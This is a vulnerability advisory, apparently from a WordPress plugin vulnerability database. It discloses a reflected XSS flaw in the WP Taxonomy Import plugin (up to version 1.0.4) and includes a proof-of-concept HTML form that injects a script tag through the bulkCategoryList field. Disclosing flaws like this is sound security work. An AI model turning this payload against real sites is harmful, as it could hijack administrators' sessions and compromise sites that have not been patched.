WordPress Plugin Vulnerabilities

WP Taxonomy Import <= 1.0.4 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
<body>
<form method="post" action="https://example.com/wp-admin/options-general.php?page=wp-taxonomy-import%2Fwp-taxonomy-import.php">
    <input id="bulkCategoryList" type="text" name="bulkCategoryList" value="</textarea><script>alert(/XSS/)</script>" />
    <input id="postsubmit" type="submit" name="submait" value="submit" />
</form>
</body>
</html>

Affects Plugins

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
kaikaix
Submitter
kaikaix
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-08-22 (about 1 years ago)
Added
2022-08-22 (about 1 years ago)
Last Updated
2023-05-11 (about 1 years ago)

Other